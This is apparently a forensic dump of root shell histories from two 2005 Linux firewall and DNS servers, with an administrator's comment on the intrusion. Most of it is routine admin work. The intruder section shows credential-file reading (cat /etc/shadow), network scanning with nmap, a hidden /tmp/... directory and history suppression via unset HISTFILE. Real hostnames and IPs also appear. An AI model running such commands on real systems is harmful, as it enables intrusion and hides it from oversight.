/etc/init.d/named 456 exit 457 cd noip-2.1.1/ 458 ll 459 vi README.FIRST 460 cd /etc/init.d/ 461 vi noip2 462 chkconfig 463 chkconfig --add noip2 464 ll 465 chmod +x noip2 466 chkconfig --add noip2 467 ll .. 468 ll 469 cd .. 470 cd rc.d 471 ll 472 cat rc 473 cd .. 
474 man chkconfig 475 vi /root/noip-2.1.1/README.FIRST 476 grep initdefault /etc/inittab | awk -F: '{print $2}' 477 ln 478 ln --help 479 ln /etc/rc3.d/S99noip2 /etc/init.d/noip2 480 ln /etc/init.d/noip2 /etc/rc3.d/S99noip2 481 ln /etc/init.d/noip2 /etc/rc0.d/K20noip 482 chkconfig --list | grep on 483 chkconfig --del webmin 484 locate webmin | more 485 exit 486 cd /etc/ 487 vi named.boot named.conf rndc.conf rndc.key 488 exit 489 cd / 490 tar zcvf thatcher.tgz etc/ var/named/ 491 dig fw.singita.co.za 492 dig -x 196.7.8.54 493 dig -x 196.7.8.57 494 dig mx singita.co.za 495 tar zcvf thatcher.tgz etc/ var/named/ var/www/ 496 cd /etc/init.d/ 497 ln /etc/init.d/noip2 /etc/rc.d/rc0.d/K90noip2 498 ln /etc/init.d/noip2 /etc/rc.d/rc1.d/K90noip2 499 ln /etc/init.d/noip2 /etc/rc.d/rc2.d/S10noip2 500 ln /etc/init.d/noip2 /etc/rc.d/rc3.d/S90noip2 501 ln /etc/init.d/noip2 /etc/rc.d/rc2.d/K25noip2 502 rm /etc/rc.d/rc2.d/S10noip2 503 ln /etc/init.d/noip2 /etc/rc.d/rc4.d/S90noip2 504 ln /etc/init.d/noip2 /etc/rc.d/rc5.d/S90noip2 505 ln /etc/init.d/noip2 /etc/rc.d/rc6.d/K08noip2 506 ll 507 cd / 508 tar zcvf thatcher.tgz etc/ var/named/ var/www/ 509 cd /etc/init.d/ 510 exit 511 usname -u 512 uname -a 513 exit 514 /etc/init.d/squid status 515 exit 516 ifconfig 517 route 518 ping www.mweb.co.za 519 reboot 520 dmesg 521 dmesg -c 522 clear 523 dmesg -c 524 dmesg 525 ping www.mweb.co.za 526 dmesg 527 ping www.mweb.co.za 528 ping www.google.com 529 ping knysna.compumail.co.za 530 exit 531 top 532 clear 533 cd /var/log/squid 534 ls 535 ls -l 536 ls 537 ls -l 538 exit 539 dmesg 540 top 541 exit 542 dnsconf 543 netconf 544 drakconnect 545 exit 546 dmesg 547 ping www.mweb.co.za 548 /etc/init.d/named status 549 cd /etc/ 550 vi named.conf 551 ping pop.woroldonline.co.za 552 ping pop.worldonline.co.za 553 telnet pop.worldonline.co.za 110 554 exit 555 dmesg 556 clear 557 dmesg 558 cd /etc/shorewall/ 559 vi rules 560 dmesg 561 vi rules 562 shorewall check 563 shorewall restart 564 vi rules 565 exit 
566 /etc/init.d/squid restart 567 dmesg -c 568 bwm 569 man lsd 570 lsd 571 lsof 572 man lsof 573 lsof | more 574 chkconfig --list | grep om 575 chkconfig --list | grep on 576 chkconfig --del numlock 577 chkconfig --del xfs 578 l 579 cd .. 580 ls of | more 581 lsof | more 582 man deffsd 583 man dvffsd 584 man devfsd 585 /etc/init.d/devfsd stop 586 lsof | more 587 588 /etc/init.d/xfs stop 589 exit 590 /etc/init.d/adsl 591 exit 592 dir 593 chdir /etc/init.d/adsl 594 help command 595 help dir 596 dir -l 597 help dir 598 dir -v 599 exit 600 lynx www.google.com 601 vi /etc/squid/squid.conf 602 auth_param basic program /usr/lib/squid/msnt_auth 603 /usr/lib/squid/msnt_auth 604 ls /usr/lib/squid/msnt_auth 605 ll /usr/lib/squid/msnt_auth 606 vi /etc/squid/msntauth.conf 607 cat /etc/hosts 608 ping server1 609 /usr/lib/squid/msnt_auth 610 dmesg -c 611 /usr/lib/squid/msnt_auth 612 dmesg -c 613 lsof | more 614 cd /usr/lib/squid/ 615 ll 616 ls 617 ls ms* 618 ./msnt_auth 619 dmesg -c 620 reboot 621 exit 622 /etc/init.d/squid restart 623 vi /etc/squid/squid.conf 624 /usr/lib/squid/msnt_auth 625 /usr/lib/squid/msnt_auth -d 626 /usr/lib/squid/msnt_auth -D 627 vi /etc/squid/msntauth.conf 628 /usr/lib/squid/msnt_auth 629 dmesg 630 vi /etc/squid/msntauth.conf 631 /usr/lib/squid/msnt_auth 632 dig server1 633 ping server1 634 ping server2 635 vi /etc/squid/msntauth.conf 636 ssh 196.25.45.214 637 /usr/lib/squid/msnt_auth 638 exit 639 ifconfig 640 ping 196.25.1.1 641 netstat -rn 642 vi /etc/sysconfig/network 643 ifconfig 644 vi /etc/sysconfig/network 645 /etc/init.d/network restart 646 vi /etc/sysctl.conf 647 /etc/init.d/network restart 648 ping 196.25.1.1 649 netstat -rn 650 ping 192.168.1.1 651 lynx 192.168.1.1 652 ifconfig 653 lynx 192.168.1.10 654 ping 192.168.1.10 655 vi /etc/sysconfig/network 656 /etc/init.d/network restart 657 ping 196.25.1.1 658 lsof | grep no 659 chkconfig --list 660 chkconfig --list | grep on 661 ping www.google.com 662 ifconfig 663 lsof | grep squid 664 
/etc/init.d/squid status 665 squid -z 666 squid -k check 667 /etc/init.d/squid start 668 squid -k check 669 /etc/init.d/squid start 670 /etc/init.d/squid restart 671 tail -f /var/log/squid/cache.log 672 tail -f /var/log/messages 673 /etc/init.d/squid stop 674 ps -ef | grep squid 675 dig server2 676 vi /etc/hosts 677 hostname 678 hostname -? 679 hostname -d office.histologic.co.za 680 hostname -d histofw.office.histologic.co.za 681 hostname histofw.office.histologic.co.za 682 hostname 683 vi /etc/hosts 684 cd /etc/ 685 grep -r office.histologic.co.za * | more 686 vi resolv.conf 687 vi /etc/sysconfig/network 688 grep -r office.histologic.co.za[D * | more 689 grep -r "office.histologic.co.za[D" * | more 690 grep -r "office.histologic.co.za\[D" * | more 691 tail -f /var/log/squid/access.log 692 tail -f /var/log/messages 693 cat /etc/hosts 694 vi /etc/hosts 695 exit 696 cd /etc/rc.d/init.d/ 697 ll noip2 698 vi noip2 699 exit 700 vi /etc/shorewall/rules 701 vi /etc/squid/squid.conf 702 squid -k reconfigure 703 exit 704 /etc/init.d/squid restart 705 dmesg -c 706 vi /etc/squid/squid.conf 707 squid -k reconfigure 708 dmesg -c 709 cd /etc/squid/ 710 vi msntauth.conf 711 vi /etc/hosts 712 squid -k reconfigure 713 /usr/lib/squid/msnt_auth 714 vi /etc/squid/ 715 cat msntauth.conf 716 ping server1 717 ping server2 718 vi /etc/hosts 719 /usr/lib/squid/msnt_auth 720 tail -f /var/log/messages 721 /usr/lib/squid/msnt_auth 722 tail -f /var/log/messages 723 vi /etc/squid/msntauth.conf 724 cat server1 /etc/hosts 725 vi /etc/squid/msntauth.conf 726 cat server1 /etc/hosts 727 vi /etc/hosts 728 vi /etc/squid/msntauth.conf 729 dmesg -c 730 /usr/lib/squid/msnt_auth 731 /etc/init.d/squid stop 732 /usr/lib/squid/msnt_auth 733 exit 734 reboot 735 cd /var/named/ 736 ll 737 vi /etc/named.conf 738 dig www.google.com 739 vi /etc/named.conf 740 ifconfig 741 netstat -rn 742 vi /etc/named.conf 743 /etc/init.d/named restart 744 ifconfig 745 /etc/init.d/named restart 746 ll 747 ifconfig 
/usr/lib/squid/msnt_auth 748 /usr/lib/squid/msnt_auth 749 /etc/init.d/squid restart 750 ext 751 exit 752 dmesg -c 753 cd /var/named/ 754 ll 755 rm office.histologic.co.za.hosts 756 rndc reload 757 ll 758 /etc/init.d/named restart 759 ll 760 /etc/init.d/squid stop 761 /usr/lib/squid/msnt_auth 762 ll 763 rndc -? 764 rndc reload 765 ll 766 cat /etc/named.conf 767 rndc reload office.histologic.co.za 768 ll 769 tail -f /var/log/messages 770 vi /etc/named.conf 771 /etc/init.d/named restart 772 vi /etc/hosts 773 vi /etc/squid/squid.conf 774 cd /etc/squid/ 775 ll /var/named/ 776 rndc reload office.histologic.co.za 777 ssh 196.15.249.214 778 dmesg -c 779 vi /etc/sysctl.conf 780 exit 781 dmesg -c 782 cd /etc/ 783 vi named.conf 784 ifconfig 785 vi named.conf 786 rmdc reload 787 rndc reload 788 /etc/init.d/named restart 789 vi /etc/shorewall/rules 790 shorewall restart 791 dmesg -c 792 tcpdump -i eth0 793 tcpdump -i eth0 not tcp port 22 794 dmesg -x 795 dmesg -c 796 dig plet.compumail.co.za 797 telnet plet.compumail.co.za 110 798 exit 799 traceroute -n 196.15.249.203 800 exit 801 passwd 802 exit 803 dir 804 exit 805 dir 806 exit 807 cd /etc/squid/ 808 vi msntauth.conf 809 exit 810 cd /etc/shorewall/ 811 vi rules 812 vi interfaces 813 ifconfig 814 vi interfaces 815 vi rules 816 vi /etc/services 817 vi rules 818 shorewall restart 819 tailf -f /var/log/messages 820 tail -f /var/log/messages 821 vi rules 822 shorewall restart 823 vi rules 824 shorewall restart 825 vi rules 826 shorewall restart 827 exit 828 cd /etc/squid/ 829 vi msntauth.conf 830 cat msntauth.conf 831 md /usr/local/squid 832 md /usr/local/squid/etc 833 exit 834 tail -f /var/log/messages 835 tail -f /var/log/messages | grep 196.15.249.205 836 ifconfig 837 ssh plet.compumail.co.za 838 telnet plet.compumail.co.za 110 839 telnet lin02.compumail.co.za 110 840 cd /etc/shorewall/ 841 vi rules 842 tail -f /var/log/messages 843 exit 844 tail -f /var/log/messages 845 ping 192.168.0.1 846 vi /etc/shorewall/rules 847 tail -f 
/var/log/messages 848 vi /etc/shorewall/rules 849 shorewall restart 850 tail -f /var/log/messages 851 vi /etc/shorewall/rules 852 cat /var/log/messages 853 vi /etc/shorewall/rules 854 ifconfig 855 vi /etc/shorewall/rules 856 shorewall restart 857 vi /etc/shorewall/rules 858 cd /etc/shorewall/ 859 vi policy 860 vi interfaces 861 tail -f /var/log/messages 862 tcpdump 863 tcpdump -ni eth1 864 tcpdump -ni eth0 865 tail -f /var/log/kernel/ 866 tail -f /var/log/syslog 867 tail -f /var/log/messages 868 exit 869 locate msnt 870 cd /etc/squid/ 871 ll 872 vi msntauth.conf 873 /etc/init.d/named status 874 /etc/init.d/named restart 875 ifcconfig 876 iconfig 877 ifconfig 878 tail -f /var/log/messages 879 clear 880 tail -f /var/log/messages 881 vi /etc/shorewall/rules 882 tail -f /var/log/messages 883 ssh knysna.compumail.co.za 884 ssh plet.compumail.co.za 885 ping plet.copmumail.co.za 886 ping www.mweb.co.za 887 ssh plet.compumail.co.za 888 ping plet.compumail.co.za 889 vi /etc/shorewall/rules 890 exit 891 tail -f /var/log/messages 892 telnet plet.compumail.co.za 110 893 vi /etc/shorewall/rules 894 tail -f /var/log/messages 895 dmesg -c 896 clear 897 tail -f /var/log/messages 898 /etc/init.d/shorewall stop 899 /etc/init.d/shorewall start 900 tail -f /var/log/messages 901 vi /etc/sysctl.conf 902 vi /etc/shorewall/masq 903 ifconfig 904 vi /etc/shorewall/masq 905 ifconfig 906 vi /etc/shorewall/masq 907 cd /etc/shorewall/ 908 shorewall restart 909 tail -f /var/log/messages 910 passwd joe 911 tail -f /var/log/messages 912 vi masq 913 shorewall restart 914 exiyt 915 eexit 916 exit 917 ifconfig 918 netstat -rn 919 cd /etc/shorewall/ 920 vi masq 921 vi policy 922 vi interfaces 923 vi policy 924 vi rules 925 shorewall restart 926 dmesg -c 927 ifconfig 928 vi /etc/sysctl.conf 929 w 930 uname -a 931 cat /etc/*-release 932 w 933 ls 934 df -h 935 cat .bash_history 936 w 937 irssi 938 BitchX 939 cd /tmp 940 mkdir ... 941 chmod 700 ... 942 cd ... 
943 ls 944 wget http://irssi.org/files/irssi-0.8.9.tar.gz 945 ftp ftp.irssi.org 946 exit 947 cd /tmp/... 948 ls 949 tar xzf * 950 cd * 951 ls 952 ./configure && make && make install 953 irssi --help 954 irssi -v 955 opensls 956 openssl 957 ./configure --help | grep ssl 958 grep ssl * 959 cd .. 960 ls 961 ifconfig 962 irssi ######## WHAT THE FUCK!? ############### 963 adduser talon 964 passwd talon 965 su talon 966 userdel talon 967 userdel -r talon 968 rm -rf /home/talon ######## WHAT THE FUCK!? ############### 969 ls 970 rm -rf * 971 w 972 cat ~/.ssh/known_hosts 973 ifconfig 974 nmap 975 ls 976 locate nmap 977 cat /etc/shadow 978 w 979 ls 980 exit 981 cd /tmp/... 982 ls 983 tar xzf * 984 cd * 985 ls 986 clear 987 ./configure && make && make install 988 cd .. 989 rm -rf * 990 nmap 991 clear 992 nmap -sP 192.168.0.1/24 993 clear 994 nmap -sS -sV -p 22 -P0 192.168.0.1/24 995 clear 996 nmap -sS -sV -P0 192.168.0.1/24 -oN nmap.log 997 clear 998 w 999 ls 1000 exit 1001 unset HISTFILE 1002 w 1003 ls -al 1004 history [root@histofw root]# [root@histofw root]# [root@histofw root]# [root@histofw root]# ps aux USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND root 1 0.0 0.1 1580 472 ? S 2004 0:03 init [3] root 2 0.0 0.0 0 0 ? SW 2004 0:00 [migration/0] root 3 0.0 0.0 0 0 ? SWN 2004 0:00 [ksoftirqd/0] root 4 0.0 0.0 0 0 ? SW 2004 0:00 [migration/1] root 5 0.0 0.0 0 0 ? SWN 2004 0:00 [ksoftirqd/1] root 6 0.0 0.0 0 0 ? SW< 2004 0:00 [events/0] root 7 0.0 0.0 0 0 ? SW< 2004 0:00 [events/1] root 8 0.0 0.0 0 0 ? SW< 2004 2:40 [kblockd/0] root 9 0.0 0.0 0 0 ? SW< 2004 2:38 [kblockd/1] root 10 0.0 0.0 0 0 ? SW 2004 0:00 [kirqd] root 13 0.0 0.0 0 0 ? SW 2004 4:06 [kswapd0] root 14 0.0 0.0 0 0 ? SW< 2004 0:00 [aio/0] root 15 0.0 0.0 0 0 ? SW< 2004 0:00 [aio/1] root 17 0.0 0.0 0 0 ? SW 2004 0:00 [kseriod] root 25 0.0 0.0 0 0 ? SW 2004 0:47 [kjournald] root 115 0.0 0.3 2040 936 ? S 2004 0:01 devfsd /dev root 205 0.0 0.0 0 0 ? SW 2004 0:00 [khubd] root 1936 0.0 0.0 1656 236 ? 
S 2004 0:00 /sbin/ifplugd -w root 2010 0.0 0.1 1656 292 ? S 2004 0:00 /sbin/ifplugd -w root 2086 0.0 0.1 1644 412 ? S 2004 0:13 syslogd -m 0 -a / root 2094 0.0 0.1 2604 304 ? S 2004 0:05 klogd -2 daemon 2126 0.0 0.1 1620 276 ? S 2004 0:00 /usr/sbin/atd root 2180 0.0 1.0 2664 2664 ? SL 2004 0:01 ntpd -A root 2219 0.0 0.1 2172 508 ? S 2004 0:00 xinetd -stayalive root 2287 0.0 0.1 1632 256 ? S 2004 0:01 crond root 2307 0.0 0.0 2240 192 ? S 2004 0:00 /usr/sbin/fwlogwa root 2357 0.0 0.0 5484 244 ? S 2004 0:00 squid -D squid 2359 0.0 23.8 89264 60496 ? S 2004 22:12 (squid) -D squid 2369 0.0 0.0 1424 36 ? S 2004 0:00 (unlinkd) squid 2440 0.0 0.0 2400 160 ? S 2004 1:39 diskd 2415616 241 root 2518 0.0 0.7 11332 2028 ? S 2004 0:03 httpd2 -f /etc/ht nobody 2609 0.0 0.1 1904 492 ? S 2004 0:01 /usr/local/bin/no root 2615 0.0 0.0 1576 128 tty1 S 2004 0:00 /sbin/mingetty tt root 2616 0.0 0.1 1576 308 tty2 S 2004 0:00 /sbin/mingetty tt root 2617 0.0 0.0 1576 124 tty3 S 2004 0:00 /sbin/mingetty tt root 2618 0.0 0.0 1576 124 tty4 S 2004 0:00 /sbin/mingetty tt root 2619 0.0 0.0 1576 120 tty5 S 2004 0:00 /sbin/mingetty tt root 2620 0.0 0.0 1576 136 tty6 S 2004 0:00 /sbin/mingetty tt root 20328 0.0 0.2 4032 516 ? S Jun01 0:00 /usr/bin/perl /us apache 20381 0.0 1.2 11412 3116 ? S Jun01 0:00 httpd2 -f /etc/ht apache 20382 0.0 1.1 11560 2944 ? S Jun01 0:00 httpd2 -f /etc/ht apache 20383 0.0 1.5 11560 3816 ? S Jun01 0:00 httpd2 -f /etc/ht apache 20384 0.0 0.8 11412 2188 ? S Jun01 0:00 httpd2 -f /etc/ht apache 20385 0.0 0.7 11412 1976 ? S Jun01 0:00 httpd2 -f /etc/ht root 1968 0.0 0.0 0 0 ? SW Jun06 0:00 [pdflush] named 9497 0.0 1.2 38792 3176 ? S Jun07 0:00 named -u named squid 17543 0.0 0.2 2104 616 ? S Jun12 0:00 (msnt_auth) squid 17547 0.0 0.2 2104 536 ? S Jun12 0:00 (msnt_auth) squid 17549 0.0 0.2 2104 532 ? S Jun12 0:00 (msnt_auth) squid 17550 0.0 0.2 2104 532 ? S Jun12 0:00 (msnt_auth) squid 17551 0.0 0.2 2104 536 ? S Jun12 0:00 (msnt_auth) apache 7468 0.0 1.2 11412 3224 ? 
S Jun12 0:00 httpd2 -f /etc/ht apache 7469 0.0 1.2 11412 3224 ? S Jun12 0:00 httpd2 -f /etc/ht apache 7470 0.0 1.2 11412 3224 ? S Jun12 0:00 httpd2 -f /etc/ht root 20821 0.0 0.0 0 0 ? SW 04:36 0:00 [pdflush] root 27630 0.0 0.5 3336 1424 ? S 05:43 0:00 /usr/sbin/sshd root 27946 0.0 0.6 6052 1712 ? S 07:30 0:00 sshd: root@pts/0 root 27948 0.0 0.6 2780 1624 pts0 S 07:30 0:00 -bash root 28001 0.0 0.3 2424 784 pts0 R 07:36 0:00 ps aux [root@histofw root]# ls -al //home/ total 12 drwxr-xr-x 3 root root 4096 Jun 12 05:27 ./ drwxr-xr-x 18 root adm 4096 Nov 25 2004 ../ drwx--x--x 3 joe joe 4096 Jun 10 13:18 joe/ [root@histofw root]# host Usage: host [-aCdlrTwv] [-c class] [-n] [-N ndots] [-t type] [-W time] [-R number] hostname [server] -a is equivalent to -v -t * -c specifies query class for non-IN data -C compares SOA records on authoritative nameservers -d is equivalent to -v -l lists all hosts in a domain, using AXFR -i Use the old IN6.INT form of IPv6 reverse lookup -N changes the number of dots allowed before root lookup is done -r disables recursive processing -R specifies number of retries for UDP packets -t specifies the query type -T enables TCP/IP mode -v enables verbose output -F Don't get next server when the first one got a SERVFAIL -w specifies to wait forever for a reply -W specifies how long to wait for a reply [root@histofw root]# hostname histofw.office.histologic.co.za [root@histofw root]# cat /root/.ssh/known_hosts
[root@histofw root]# ls -al /tmp/.../ total 16 drwx------ 2 root root 4096 Jun 12 06:03 ./ drwxrwxrwt 6 root root 4096 Jun 14 05:14 ../ -rw-r--r-- 1 root root 5595 Jun 12 14:30 nmap.log [root@histofw root]# cat /tmp/.../nmap.log # nmap 3.81 scan initiated Sun Jun 12 06:03:16 2005 as: nmap -sS -sV -P0 -oN nmap.log 192.168.0.1/24 Interesting ports on histofw.office.histologic.co.za (192.168.0.10): (The 1657 ports scanned but not shown below are in state: closed) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH
3.6.1p2 (protocol 1.99) 53/tcp open domain ISC Bind 9.2.3 80/tcp open http Apache Advanced Extranet Server httpd 2.0.48 110/tcp open pop3 UW Imap pop3 server 2003.83mdk 443/tcp open ssl/http Apache Advanced Extranet Server httpd 2.0.48 3128/tcp open http-proxy Squid webproxy 2.5.STABLE4
[root@histofw root]# ls -al /var/tmp/ total 12 drwxrwxrwt 3 root root 4096 Jun 14 04:07 ./ drwxr-xr-x 21 root root 4096 May 12 2004 ../ drwx------ 4 root root 4096 May 13 2004 kdecache-root/ [root@histofw run]# [root@histofw run]# cd /home/joe/ [root@histofw joe]# ls -al total 36 drwx--x--x 3 joe joe 4096 Jun 10 13:18 ./ drwxr-xr-x 3 root root 4096 Jun 12 05:27 ../ -rw------- 1 joe joe 3 Jun 10 13:18 .bash_history -rw-r--r-- 1 joe joe 24 May 12 2004 .bash_logout -rw-r--r-- 1 joe joe 191 May 12 2004 .bash_profile -rw-r--r-- 1 joe joe 124 May 12 2004 .bashrc -rw-r--r-- 1 joe joe 141 May 12 2004 .mailcap -rw-r--r-- 1 joe joe 3729 May 12 2004 .screenrc drwx------ 2 joe joe 4096 May 12 2004 tmp/ [root@histofw joe]# cat .bash_history su [root@histofw joe]# cat /etc/shadow
------------------------------------ skew @ knysna: absolutely nothing here just some lame hacking attempts it seems. ------------------------------------ login as: root root@knysna.compumail.co.za's password: Last login: Tue Jun 14 01:42:21 2005 from dsl-5-37.sg-b.tiscali.no [root@knysna root]# w 06:49:22 up 63 days, 14:35, 2 users, load average: 0.09, 0.03, 0.00 USER TTY LOGIN@ IDLE JCPU PCPU WHAT root vc/1 01Jun05 5days 0.03s 0.03s -bash root pts/0 Mon09 18:39m 0.03s 0.03s -bash [root@knysna root]# uname unset HISTFILE [root@knysna root]# uname -a ; cat /etc/issue Linux knysna 2.6.3-7mdk-p3-smp-64GB #1 SMP Wed Mar 17 15:34:39 CET 2004 i686 unknown unknown GNU/Linux Mandrake Linux release 10.0 (Official) for i586 Kernel 2.6.3-7mdk-p3-smp-64GB on a Dual-processor i686 / \l [root@knysna root]# history 4 dig www.anchorrand.com 5 exit 6 bwm 7 exit 8 bwm 9 tcpdump -ni wp7aft 10 exit 11 bwm 12 wanrouter status 13 bwm 14 exit 15 ping www.logisticor.com 16 dig www.logisticor.com @196.25.1.1 17 dig www.logisticor.com @196.25.1.11 18 dig www.logisticor.com @induna.saix.net 19 dig www.logisticor.com @igubu.saix.net 20 /etc/init.d/named 21 /etc/init.d/named restart 22 dig www.logisticor.com @196.15.249.203 23 dig www.logisticor.com @196.15.249.204 24 exit 25 dig www.logisticor.com @196.15.249.204 26 dig www.logisticor.com @196.15.249.203 27 dig www.logisticor.com @192.168.20.2 28 dig logisticor.com @192.168.20.2 29 dig www.logisticor.com @192.168.20.2 30 dig www.logisticor.com @196.15.249.204 31 dig www.logisticor.com @induna.saix.net 32 exit 33 bwm 34 exit 35 dmesg | grep 196.25.45.221 36 dmesg -c 37 clear 38 tail -f /var/log/messages 39 tail -f /var/log/messages | grep 196.25.45.221 40 route 41 route add -net 196.25.45.220 netmask 25.255.255.252 gw 196.15.249.205 42 route add -net 196.25.45.220 netmask 255.255.255.252 gw 196.15.249.205 43 route 44 exit 45 cat
/etc/services | grep https 46 exit 47 vi /etc/in 48 vi /var/named/ 49 vi /var/named/logisticor.com 50 rndc reload 51 dig ftp.logisticor.com 52 ping ftp.logisticor.com 53 vi /var/named/logisticor.com 54 rndc reload 55 ping ftp.logisticor.com 56 dig ftp.logisticor.com 57 vi /var/named/logisticor.com 58 rndc reload 59 dig ftp.logisticor.com 60 ping ftp.logisticor.com 61 exit 62 dig www.logisticor.com 63 cd /var/named/ 64 ls 65 vi logisticor.com 66 rcdc reload 67 rndc reload 68 dig www.logisticor.com\ 69 dig www.logisticor.com 70 /etc/init.d/named restart 71 dig www.logisticor.com 72 vi namerd 73 vi named. 74 vi logisticor.com 75 dig www.logisticor.com 76 cd /var/named/ 77 vi compumail.co.za 78 ll 79 dig alltransportneeds.co.za 80 dig atn.co.za 81 dig atn.com 82 exit 83 vi /var/named/parktonian.co.za 84 rndc reload parktonian.co.za 85 dig www.parktonian.co.za 86 exit 87 bwm 88 exit 89 cd /var/named/ 90 cat gea-westfalia.co.za 91 vi gea-westfalia.co.za 92 rncd reload gea-westfalia.co.za 93 rndc reload gea-westfalia.co.za 94 dig gea-westfalia.co.za 95 vi gea-westfalia.co.za 96 exit 97 cd /var/named/ 98 ls 99 vi logisticor.com 100 rndc reload 101 dig www.logisticor.com 102 ping www.logisticor.com 103 dig www.logisticor.com 104 vi logisticor.com 105 /etc/init.d/named resatrt 106 /etc/init.d/named resatart 107 /etc/init.d/named restart 108 dig www.logisticor.com\ 109 dig www.logisticor.com 110 dig logisticor.com 111 dig www.logisticor.com 112 ping web01.compumail.co.za 113 vi logisticor.com 114 /etc/init.d/named resatart 115 /etc/init.d/named restart 116 rndc reload 117 dig www.logisticor.com 118 exit 119 cd /etc/sysconfig/network-scripts/ 120 ll 121 vi ifcfg-eth0 122 ll 123 ifconfig 124 exit 125 ifconfig | more 126 exit 127 bwm 128 tcpdump -ni wp7aft 129 tcpdump -i wp7aft 130 exit 131 bwm 132 ssh 196.15.249.254 133 bwm 134 dig mail.tiscpty.com 135 cd /var/named/ 136 vi khuphukani.co.za 137 passwd kh_info 138 vi khuphukani.co.za 139 rndc reload 140 /etc/init.d/named resatrt 
141 /etc/init.d/named restart 142 exit 143 ssh joe@165.146.35.51 144 ssh parktonian.no-ip.info 145 exit 146 cd /var/named/ 147 vi geospace.co.za 148 rndc reload geospace.co.za 149 exit 150 ifconfig 151 ssh joe@196.25.45.246 152 ifconfig 153 bwm 154 ssh 196.25.45.234 155 ssh 196.25.29.178 156 grep /var/log/httpd/access_log 157 more /var/log/httpd/access_log 158 more /var/log/httpd/error_log 159 exit 160 vi /etc/named.conf 161 exit 162 cd /var/named/ 163 vi ibe.co.za 164 cat candnhose.com 165 vi ibe.co.za 166 cat candnhose.com 167 vi ibe.co.za 168 rndc reload ibe.co.za 169 exit 170 bwm 171 exit 172 vi /var/named/delvenco.co.za 173 rndc reload delvenco.co.za 174 dig mobile.delvenco.co.za 175 xit 176 exit 177 bwm 178 ifconfig wp11aft 179 ssh joe@196.25.45.246 180 exit 181 ssh mail.delvenco.co.za 182 ssh mobile.delvenco.co.za 183 exit 184 vi /var/named/delvenco.co.za 185 telnet mobile.delvenco.co.za 25 186 rndc reload 187 rndc reload delvenco.co.za 188 cd /var/named/ 189 vi onestar.co.za 190 vi liberne.co.za 191 vi webz-r-us.co.za 192 rndc reload onestar.co.za 193 rndc reload liberne.co.za 194 rndc reload webz-r-us.co.za 195 dig onestar.co.za mx 196 dig liberne.co.za mx 197 ssh 196.15.249.204 198 exit 199 ssh plet.compumail.co.za 200 exit 201 ssh berner.no-ip.info 202 ssh joe@berner.no-ip.info 203 cat /var/named/logisticor.com 204 vi /var/named/logisticor.com 205 rndc reload logisticor.com 206 ll /var/named/ 207 exit 208 ssh lin02.compumail.co.za 209 exit 210 ssh 196.25.45.234 211 ssh plet 212 bwm 213 ssh plet.compumail.co.za 214 exit 215 ll 216 exit 217 vi /etc/named.conf 218 rm -fr /var/named/pakmatic.co.za 219 rndc reload 220 exit 221 ssh parktonian.no-ip.info 222 parktonian.no-ip.info 223 ping parktonian.no-ip.info 224 ssh parktonian.no-ip.info 225 exit 226 bwm 227 exit 228 vi /var/ 229 cd /var 230 ls 231 cd .. 
232 locate named 233 cd /var/man 234 cd /var/named/ 235 ls 236 vi tiscpty.com 237 rndc reload tiscpty.com 238 dig tiscpty.com mx 239 dig mail.tiscpty.com 240 dig mail.tiscpty.com @196.15.249.203 241 dig mail.tiscpty.com @196.15.249.204 242 dig mail.tiscpty.com @196.15.249.203 243 dig mail.tiscpty.com @196.15.249.204 244 dig mail.tiscpty.com @196.15.249.203 245 /etc/init.d/named restart 246 dig mail.tiscpty.com @196.15.249.203 247 dig mail.tiscpty.com @196.15.249.204 248 dig mail.tiscpty.com 249 /etc/init.d/named start 250 /etc/init.d/named restart 251 dig mail.tiscpty.com 252 dig mail.tiscpty.com @196.15.249.204 253 dig mail.tiscpty.com @196.15.249.203 254 ifconfig 255 dig mail.tiscpty.com @196.15.249.203 256 vi /var/named/ 257 vi /var/named/tiscpty.com 258 rndc reload 259 dig mail.tiscpty.com @196.15.249.204 260 dig mail.tiscpty.com @196.15.249.203 261 vi tiscpty.com 262 vi acetron.co.za 263 vi tiscpty.com 264 rndc reload 265 dig mail.tiscpty.com @196.15.249.203 266 dig tiscpty.com @196.15.249.203 267 dig tiscpty.com mx @196.15.249.203 268 dig tiscpty.com mx @196.15.249.204 269 dig tiscpty.com @196.15.249.204 270 dig tiscpty.com @196.15.249.203 271 vi tiscpty 272 vi tiscpty.com 273 vi acetron.co.za 274 vi tiscpty.com 275 rndc reload 276 dig tiscpty.com @196.15.249.203 277 dig tiscpty.com mx 278 dig mail.tiscpty.com 279 vi thehouses.co.za 280 exit 281 cd /var/named/ 282 ls 283 vi nestlife.co.za 284 rndc reload 285 vi nestlife.co.za 286 vi nestlife.co.za 287 vi knowres.co.za 288 vi nestlife.co.za 289 vi knowres.co.za 290 vi nestlife.co.za 291 rndc reload 292 cd /var/named/ 293 vi nestlife.co.za 294 dig nestlife.co.za mx 295 dig nestlife.co.za 296 dig mail.nestlife.co.za 297 dig www.nestlife.co.za 298 vi nestlife.co.za 299 dig www.nestlife.co.za 300 vi nestlife.co.za 301 rndc reload 302 dig pop.netl 303 dig pop.nestlife.co.za 304 ssh plet.compumail.co.za 305 ls 306 ifconfig 307 ssh 196.25.45.254 308 wbm 309 bwm 310 exit 311 vi /var/named/geospace.co.za 312 rndc 
reload geospace.co.za 313 vi /var/named/geospace.co.za 314 rndc reload geospace.co.za 315 dig geospace.co.za 316 dig www.geospace.co.za 317 dig geospace.co.za 318 vi /var/named/geospace.co.za 319 rndc reload geospace.co.za 320 dig geospace.co.za 321 view /var/log/mail/info 322 view /var/log/messages 323 vi /var/named/geospace.co.za 324 rndc reload geospace.co.za 325 view /var/log/messages 326 tail -f /var/log/messages 327 vi /var/named/motocomp.co.za 328 tail -f /var/log/messages 329 dig geospace.co.za @co.za 330 dig geospace.co.za ns @co.za 331 exit 332 dig geospace.co.za 333 rndc reload 334 dig geospace.co.za 335 vi /var/named/geospace.co.za 336 rndc reload 337 vi /var/named/nestlife.co.za 338 rndc reload 339 vi /var/named/nestlife.co.za 340 rndc reload 341 cd /var/named/ 342 vi geospace. 343 vi geospace.co.za 344 rndc reload geospace.co.za 345 dig geospace.co.za 346 dig geospace.co.za @127.0.0.1 347 dig geospace.co.za 348 rndc reload 349 vi geospace.co.za 350 rndc reload 351 exit 352 tail -f /var/log/messages 353 exit 354 cd /var/named/ 355 ll geospace.co.za 356 vi geospace.aero 357 vi geospace.co.za 358 rndc reload geospace.co.za 359 di gwww.geospace.co.za 360 dig gwww.geospace.co.za 361 dig www.geospace.co.za 362 rndc reload 363 vi 